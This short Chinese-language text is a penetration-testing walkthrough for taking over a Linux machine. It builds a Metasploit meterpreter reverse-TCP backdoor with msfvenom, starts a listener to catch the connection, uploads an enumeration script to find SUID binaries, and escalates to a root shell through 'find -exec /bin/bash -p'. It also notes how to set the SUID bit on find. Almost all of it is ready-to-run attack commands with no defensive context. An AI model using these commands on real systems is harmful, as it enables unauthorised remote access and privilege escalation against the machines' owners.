1.MSF连接目标机
生成msf后门,上传到目标机,开启监听,等待运行。
>msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=6666 -i 3 -f elf -o shell //生成后门
>set payload linux/x64/meterpreter/reverse_tcp
>set lhost 0.0.0.0
>set lport 6666
>exploit
2.上传信息收集脚本
上传信息收集脚本到目标机,运行结果可以看到带有suid的命令。
注:chmod u+s find 可以给find命令添加suid
3.漏洞利用
通过信息收集,发现存在suid漏洞,利用带有suid的find命令进行提权。
touch san
find san -exec whoami \;
find san -exec /bin/bash -p \;